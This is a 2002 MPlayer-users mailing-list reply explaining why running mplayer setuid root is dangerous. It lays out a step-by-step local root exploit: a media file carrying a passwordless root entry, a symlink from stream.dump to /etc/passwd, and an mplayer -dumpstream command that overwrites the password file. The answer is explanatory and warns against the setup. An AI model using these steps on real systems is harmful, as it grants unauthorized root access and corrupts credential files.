[MPlayer-users] Setuid root mplayer

D Richard Felker III dalias at aerifal.cx
Wed Aug 28 15:55:02 CEST 2002


On Wed, Aug 28, 2002 at 12:30:23PM +0200, Davide Decicco wrote:
> [Automatic answer: RTFM (read DOCS, FAQ), also read DOCS/bugreports.html]
> Is someone able to explain me (or point me to some useful resource on the
> web) why setuid root mplayer is a security risk ? How can one gain root
> privileges through it ?
> Thanks.

1) Make an mp3 file containing the string (\n = newline):

\nroot::0:0::/root:/bin/sh\n

2) Mux it into an avi with mencoder.

3) ln -s /etc/passwd stream.dump

4) mplayer -dumpstream your.avi

5) Login as root with no password.

Sound good? That's just a dumb simple approach that assumes blank
passwords are allowed on the system and the passwords are stored in
/etc/passwd. Of course there are much better ways too.

Rich





More information about the MPlayer-users mailing list